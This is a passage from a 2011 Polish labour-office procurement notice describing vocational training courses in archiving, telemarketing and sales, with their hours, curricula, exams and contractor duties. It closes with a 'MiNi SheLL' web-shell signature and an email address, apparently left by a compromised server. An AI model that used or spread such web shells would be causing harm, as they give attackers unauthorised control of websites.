-	Program szkolenia powinien zawierać następujące elementy: Program szkolenia powinien być opracowany zgodnie z obowiązującymi w tym zakresie przepisami prawa oraz musi uwzględniać następujące zagadnienia: zasady organizacji i prowadzenia spraw kadrowych, zasady naliczania, rozliczania płac i prowadzenia dokumentacji, współpraca z ZUS i Urzędem Skarbowy, prawo z uwzględnieniem prawa pracy i prawa podatkowego, obsługa komputera od podstaw z wykorzystaniem programów edytorskich Windows, Word, Excel, Internet, obsługa programów komputerowych wykorzystywanych w kadrach i płacach, obsługa urządzeń biurowych takich jak: fax, ksero, itp.

Wymagania programowe:
-	Program musi być opracowany zgodnie z obowiązującymi przepisami prawa.
-	Uwzględnia zajęcia teoretyczne oraz praktyczne (ćwiczenia) oraz sposoby sprawdzania efektów nauczania. Kształt i metodyka nauczania musi odpowiadać potrzebom dydaktycznym osób dorosłych. Przy jego realizacji konieczne jest, aby uczestnicy szkoleń mieli dostęp do nowoczesnych metod zdobywania wiedzy, m.in. poprzez dostęp do komputera, internetu. 
-	Plan nauczania powinien określać przedmioty nauczania i ich wymiar, rozkład zajęć oraz częstotliwość. Treść, kształt planu i czas trwania szkolenia muszą być odpowiednie, aby osiągnąć cel szkolenia.
-	Wszystkie zajęcia muszą być prowadzone przez wykładowcę/instruktora, który posiada kwalifikacje zawodowe z zgodne z tematyka realizowanych zajęć. Nie dopuszcza się prowadzenia zajęć drogą elektroniczną, metodą e-learningu, w formie eksternistycznej, itp.
-	Szkolenie powinno zakończyć się egzaminem potwierdzającym uzyskanie kwalifikacji oraz wydaniem zaświadczeń (uprawnień) dla osób kończącym szkolenie z wynikiem pozytywnym, zgodnie z przepisami dotyczącymi zasad i warunków podnoszenia kwalifikacji zawodowych i wykształcenia ogólnego osób dorosłych oraz innych ustaw regulujących organizację ww. szkoleń. W przypadku osób, których szkolenie będzie współfinansowane ze środków Unii Europejskiej - Europejskiego Funduszu Społecznego w ramach Programu Kapitał Ludzki wystawi dokumenty z wykorzystaniem logo EFS zgodnie z wytycznymi zamieszczonymi na stronie internetowej: www.efs.gov.pl/ZPFE/Zasady.asx .
-	Czas przeznaczony na egzamin nie wlicza się do godzin szkolenia.
-	Dla zapewnienia jakości szkolenia instytucja szkoleniowa musi zapewnić  nadzór wewnętrzny służący podnoszeniu jakości szkolenia, polegającym na bieżącej kontroli jakości i efektów szkolenia, sprawowany przez osobę z przygotowaniem pedagogicznym. 
-	Nadzór wewnętrzny nie może sprawować wykładowca / instruktor wskazany do realizacji szkolenia.
-	Wskazana ilość osób do przeszkolenia może ulec zmianie, ponieważ szkolenia będą realizowane w zależności od potrzeb bezrobotnych. PUP pokryje koszty wynikające z preliminarza w przeliczeniu na 1 uczestnika, za każdą osobę skierowaną. Osoby będą kierowane na szkolenie w grupach szkoleniowych od 1-10 osób, pod warunkiem zapewnienia dla każdego uczestnika samo-dzielnych stanowisk szkoleniowych.

Wykonawca na okres szkolenia będzie zobowiązany:
-	Prowadzić dokumentację przebiegu szkolenia m.in.: dziennik zajęć edukacyjnych zawierający listę obecności, wymiar godzin i tematy zajęć edukacyjnych, protokół z egzaminu, rejestr wydanych zaświadczeń lub innych dokumentów potwierdzających ukończenie szkolenia i uzyskanie kwalifikacji.
-	Ubezpieczyć uczestników szkolenia od następstw nieszczęśliwych wypadków na podstawie odrębnej listy osób wskazanych do ubezpieczenia przez PUP. Koszt ubezpieczenia zostaną uregulowane na podstawie wystawionej faktury i polisy.
-	Kontrolować obecność uczestników na zajęciach, informować na bieżąco PUP o nieobecnościach lub przerwaniu szkolenia przez osoby skierowane.
-	Sporządzać protokoły z przebiegu egzaminów.
-	Przeprowadzić ocenę realizowanego szkolenia poprzez wypełnienie ankiety przez uczestników szkolenia oraz przekazanie jej wyników oceny do PUP wraz z dokumentacją szkolenia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. Jakość - 60</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Kurs kancelaryjno-archiwalny I i II stopnia (10osób).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> -	Liczba osób do przeszkolenia - 10. 
-	Termin wykonania zamówienia: od dnia podpisania umowy do 30.11.2011 r., rozpoczęcie IV kwartał, dokładny termin będzie ustalony po wyborze jednostki szkoleniowej. 
-	Czas trwania kursu do 3 tygodni dla grupy, zajęcia w ciągu dnia nie mogą przekroczyć 8 godzin, w przedziale czasu w godz. 8-18, 1 godzina zajęć teoretycznych trwa 45 minut + 15 min. przerwa lekcyjna, wykonawca zobowiązany jest zapewnić przerwy pomiędzy lekcjami, min. 25 godzin zegarowych w tygodniu.
-	Ilość godzin szkolenia ogółem - min. 72 godzin na 1 uczestnika, w tym:
-	Ilość godzin szkolenia teoretycznego - min.28 godzin
-	Ilość godzin szkolenia praktycznego - min. 44 godziny
-	Miejsce przeprowadzenia szkoleń - Gorzów Wlkp. 
-	Celem szkolenia jest teoretyczne i praktyczne przygotowanie uczestników szkolenia do wykonywania pracy na stanowisku archiwisty i referenta kancelaryjnego oraz zdobycie wiedzy na temat podstaw teorii i metodyki archiwalnej, ze szczególnym uwzględnieniem organizacji i metod pracy w archiwum zakładowym i składnicy akt oraz przygotowania materiałów archiwalnych do przekazania do archiwum państwowego.
-	Program szkolenia powinien zawierać w szczególności moduły w zakresie:
a) zakładania, organizowania i prowadzenia archiwum 
b) gromadzenia, przechowywania i udostępniania zasobu archiwalnego,
c) prowadzenia ewidencji w archiwum,
d) klasyfikowania i kwalifikowania dokumentacji archiwalnej,
e) prowadzenie ewidencji w archiwum,
f) obsługi komputerowego systemu informacji archiwalnej,
g) zabezpieczania dokumentacji archiwalnej,
h) popularyzowania materiałów archiwalnych,
i) zarządzania dokumentacją w kancelariach urzędów i innych jednostkach organizacyjnych,
j) przygotowania materiałów archiwalnych do przekazania do archiwum państwowego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. Jakość - 60</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Kurs telemarketer z obsługą komputera (10 osób).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> -	Liczba osób do przeszkolenia - 10.
-	Termin wykonania zamówienia: od dnia podpisania umowy do 30.11.2011 r., rozpoczęcie IV kwartał, dokładny termin będzie ustalony po wyborze jednostki szkoleniowej. 
-	Czas trwania kursu do 5 tygodni dla grupy, zajęcia w ciągu dnia nie mogą przekroczyć 8 godzin, w przedziale czasu w godz. 8-18, 1 godzina zajęć teoretycznych trwa 45 minut + 15 min. przerwa lekcyjna, wykonawca zobowiązany jest zapewnić przerwy pomiędzy lekcjami, min. 25 godzin zegarowych w tygodniu.
-	Ilość godzin szkolenia ogółem - min. 150 godzin na 1 uczestnika, w tym:
-	Ilość godzin szkolenia teoretycznego - min. 30 godzin
-	Ilość godzin szkolenia praktycznego - min. 120 godzin.
-	Miejsce przeprowadzenia szkoleń - Gorzów Wlkp. 
-	Celem szkolenia jest nabycie wiedzy i umiejętności niezbędnych do podjęcia zatrudnienia na stanowisku telemarketera, specjalisty ds. marketingu, przedstawiciela handlowego,  oraz zdobycie stosownych zaświadczeń. 
-	Program szkolenia powinien zawierać następujące elementy: zasady telemarketingu, przygotowanie do rozmowy telefonicznej (plan działań, praca nad głosem, kontrola głosu, wyrażanie emocji), budowa i formułowanie przekazu, sprzedaż przez telefon, bariery efektywnego komunikowania się w sprzedaży, telemarketer i handlowiec w zespole, połączenie rozmowy telefonicznej i wysyłki, sprzedaż telefoniczna od strony sprzedawcy, sprzedaż telefoniczna od strony klienta, efektywne słuchanie, techniki zadawania pytań, techniki sprzedaży i negocjacji wykorzystywane w telemarketingu, mierzenie efektywności działań telemarketingowych, obsługa komputera program Windows, Pakiet  Office, Word, Excel, Internet, email) oraz urządzeń biurowych (telefon, fax. skaner, kopiarka).

Wymagania programowe:
-	Program musi być opracowany zgodnie z obowiązującymi przepisami prawa.
-	Uwzględnia zajęcia teoretyczne oraz praktyczne (ćwiczenia) oraz sposoby sprawdzania efektów nauczania. Kształt i metodyka nauczania musi odpowiadać potrzebom dydaktycznym osób dorosłych. Przy jego realizacji konieczne jest, aby uczestnicy szkoleń mieli dostęp do nowoczesnych metod zdobywania wiedzy, m.in. poprzez dostęp do komputera, internetu. 
-	Plan nauczania powinien określać przedmioty nauczania i ich wymiar, rozkład zajęć oraz częstotliwość. Treść, kształt planu i czas trwania szkolenia muszą być odpowiednie, aby osiągnąć cel szkolenia.
-	Wszystkie zajęcia muszą być prowadzone przez wykładowcę/instruktora, który posiada kwalifikacje zawodowe z zgodne z tematyka realizowanych zajęć. Nie dopuszcza się prowadzenia zajęć drogą elektroniczną, metodą e-learningu, w formie eksternistycznej, itp.
-	Szkolenie powinno zakończyć się egzaminem potwierdzającym uzyskanie kwalifikacji oraz wydaniem zaświadczeń (uprawnień) dla osób kończących szkolenie z wynikiem pozytywnym, zgodnie z przepisami dotyczącymi zasad i warunków podnoszenia kwalifikacji zawodowych i wykształcenia ogólnego osób dorosłych oraz innych ustaw regulujących organizację ww. szkoleń. W przypadku osób, których szkolenie będzie współfinansowane ze środków Unii Europejskiej - Europejskiego Funduszu Społecznego w ramach Programu Kapitał Ludzki wystawi dokumenty z wykorzystaniem logo EFS zgodnie z wytycznymi zamieszczonymi na stronie internetowej: www.efs.gov.pl/ZPFE/Zasady.asx .
-	Czas przeznaczony na egzamin nie wlicza się do godzin szkolenia.
-	Dla zapewnienia jakości szkolenia instytucja szkoleniowa musi zapewnić  nadzór wewnętrzny służący podnoszeniu jakości szkolenia, polegającym na bieżącej kontroli jakości i efektów szkolenia, sprawowany przez osobę z przygotowaniem pedagogicznym. 
-	Nadzór wewnętrzny nie może sprawować wykładowca / instruktor wskazany do realizacji szkolenia.
-	Wskazana ilość osób do przeszkolenia może ulec zmianie, ponieważ szkolenia będą realizowane w zależności od potrzeb bezrobotnych. Osoby będą kierowane na szkolenie w grupach szkoleniowych od 1-10 osób, pod warunkiem zapewnienia dla każdego uczestnika samodzielnych stanowisk szkoleniowych.

Wykonawca na okres szkolenia będzie zobowiązany:
-	Prowadzić dokumentację przebiegu szkolenia m.in.: dziennik zajęć edukacyjnych zawierający listę obecności, wymiar godzin i tematy zajęć edukacyjnych, protokół z egzaminu, rejestr wydanych zaświadczeń lub innych dokumentów potwierdzających ukończenie szkolenia i uzyskanie kwalifikacji.
-	Kontrolować obecność uczestników na zajęciach, informować na bieżąco PUP o nieobecnościach lub przerwaniu szkolenia przez osoby skierowane.
-	Ubezpieczyć uczestników szkolenia od następstw nieszczęśliwych wypadków na podstawie odrębnej listy osób wskazanych do ubezpieczenia przez PUP. Koszt ubezpieczenia zostaną uregulowane na podstawie wystawionej faktury i polisy.
-	Sporządzać protokoły z przebiegu egzaminów.
-	Przeprowadzić ocenę realizowanego szkolenia poprzez wypełnienie ankiety przez uczestników szkolenia oraz przekazanie jej wyników oceny do PUP wraz z dokumentacją szkolenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. Jakość - 60</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Kurs przedstawiciel handlowy z obsługą komputera (10 osób).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> -	Liczba osób do przeszkolenia - 10. 
-	Termin wykonania zamówienia: od dnia podpisania umowy do 30.11.2011 r., rozpoczęcie IV kwartał, dokładny termin będzie ustalony po wyborze jednostki szkoleniowej. 
-	Czas trwania kursu do 8 tygodni dla grupy, zajęcia w ciągu dnia nie mogą przekroczyć 8 godzin, w przedziale czasu od godz. 8.00 - 18.00, min. 25 godzin w 1 tygodniu, 1 godzina zajęć trwa 45 minut+15 min. przerwa lekcyjna, wykonawca zobowiązany jest zapewnić przerwy pomiędzy lekcjami.
-	Ilość godzin szkolenia - min. 240 godzin na 1 uczestnika, w tym:
Ilość godzin szkolenia teoretycznego - min. 50 godzin
Ilość godzin szkolenia praktycznego - min. 190 godzin łącznie z obsługą komputera (100 godzin).
-	Miejsce przeprowadzenia szkoleń - Gorzów Wlkp. 
-	Celem szkolenia jest nabycie wiedzy i umiejętności niezbędnych do podjęcia zatrudnienia na stanowisku handlowcy, przedstawiciela handlowego, sprzedawcy oraz zdobycie stosownych uprawnień. 
-	Program szkolenia musi zawierać następujące elementy: metody poszukiwania klientów, nawiązywanie kontaktu telefonicznego z klientem, zasady komunikacji telefonicznej - jak zachęcić klienta do rozmowy, praca głosem, bariery komunikacyjne - co utrudnia lub uniemożliwia zainteresowanie klientów ofertą, jak budować relacje z klientami, gdy kontakt telefoniczny zawiedzie, budowanie relacji z klientem - zasady skutecznej sprzedaży, techniki sprzedaży, rozpoznanie potrzeb, jak rozmawiać z klientem aby sfinalizować sprzedaż - typy klientów i metody komunikacji z klientem, podstawowe narzędzia negocjacyjne - gry negocjacyjne stosowane przez klientów i sposoby radzenia sobie z nimi, 
-	radzenie sobie z sytuacjami trudnymi - jak postępować z zastrzeżeniami klienta, tworzenie i prezentacja oferty klientowi, kiedy należy tworzyć i przekazać ofertę klientowi, co powinno znaleźć się w ofercie, jak wykorzystać informacje zebrane od klienta do tworzenia oferty, prezentacja osobista czy korespondencyjna - zalety i wady, zasady prezentacji oferty w kontakcie bezpośrednim z klientem, zasady prezentacji oferty korespondencyjnie klientowi, rozmowa o ofercie, w jakim czasie kontaktować się z klientem, jak rozmawiać o ofercie - sztuka odpierania zarzutów i mówienia językiem korzyści, finalizacja sprzedaży, etapy sprzedaży a finalizacja transakcji, przeciwdziałanie wypaleniu zawodowemu, warsztaty psychologiczne, nauka obsługi komputera z wykorzystaniem programowania Windows, Pakiet Office, Excel, Internet, nauka obsługi kas fiskalnych.

Wymagania programowe:
-	Program musi być opracowany zgodnie z obowiązującymi przepisami prawa.
-	Uwzględnia zajęcia teoretyczne oraz praktyczne (ćwiczenia) oraz sposoby sprawdzania efektów nauczania. Kształt i metodyka nauczania musi odpowiadać potrzebom dydaktycznym osób dorosłych. Przy jego realizacji konieczne jest, aby uczestnicy szkoleń mieli dostęp do nowoczesnych metod zdobywania wiedzy, m.in. poprzez dostęp do komputera, internetu. 
-	Plan nauczania powinien określać przedmioty nauczania i ich wymiar, rozkład zajęć oraz częstotliwość. Treść, kształt planu i czas trwania szkolenia muszą być odpowiednie, aby osiągnąć cel szkolenia.
-	Wszystkie zajęcia muszą być prowadzone przez wykładowcę/instruktora, który posiada kwalifikacje zawodowe z zgodne z tematyka realizowanych zajęć. Nie dopuszcza się prowadzenia zajęć drogą elektroniczną, metodą e-learningu, w formie eksternistycznej, itp.
-	Szkolenie powinno zakończyć się egzaminem potwierdzającym uzyskanie kwalifikacji oraz wydaniem zaświadczeń (uprawnień) dla osób kończącym szkolenie z wynikiem pozytywnym, zgodnie z przepisami dotyczącymi zasad i warunków podnoszenia kwalifikacji zawodowych i wykształcenia ogólnego osób dorosłych oraz innych ustaw regulujących organizację ww. szkoleń. W przypadku osób, których szkolenie będzie współfinansowane ze środków Unii Europejskiej - Europejskiego Funduszu Społecznego w ramach Programu Kapitał Ludzki wystawi dokumenty z wykorzystaniem logo EFS zgodnie z wytycznymi zamieszczonymi na stronie internetowej: www.efs.gov.pl.
-	Czas przeznaczony na egzamin nie wlicza się do godzin szkolenia.
-	Dla zapewnienia jakości szkolenia instytucja szkoleniowa musi zapewnić  nadzór wewnętrzny służący podnoszeniu jakości szkolenia, polegającym na bieżącej kontroli jakości i efektów szkolenia, sprawowany przez osobę z przygotowaniem pedagogicznym. 
-	Nadzór wewnętrzny nie może sprawować wykładowca / instruktor wskazany do realizacji szkolenia.
-	Wskazana ilość osób do przeszkolenia może ulec zmianie, ponieważ szkolenia będą realizowane w zależności od potrzeb bezrobotnych. PUP pokryje koszty wynikające z preliminarza w przeliczeniu na 1 uczestnika, za każdą osobę skierowaną. Osoby będą kierowane na szkolenie w grupach szkoleniowych od 1-10 osób, pod warunkiem zapewnienia dla każdego uczestnika samodzielnych stanowisk szkoleniowych.

Wykonawca na okres szkolenia będzie zobowiązany:
-	Prowadzić dokumentację przebiegu szkolenia m.in.: dziennik zajęć edukacyjnych zawierający listę obecności, wymiar godzin i tematy zajęć edukacyjnych, protokół z egzaminu, rejestr wydanych zaświadczeń lub innych dokumentów potwierdzających ukończenie szkolenia i uzyskanie kwalifikacji.
-	Kontrolować obecność uczestników na zajęciach, informować na bieżąco PUP o nieobecnościach lub przerwaniu szkolenia przez osoby skierowane.
-	Sporządzać protokoły z przebiegu egzaminów.
-	Przeprowadzić ocenę realizowanego szkolenia poprzez wypełnienie ankiety przez uczestników szkolenia oraz przekazanie jej wyników oceny do PUP wraz z dokumentacją szkolenia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. Jakość - 60</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com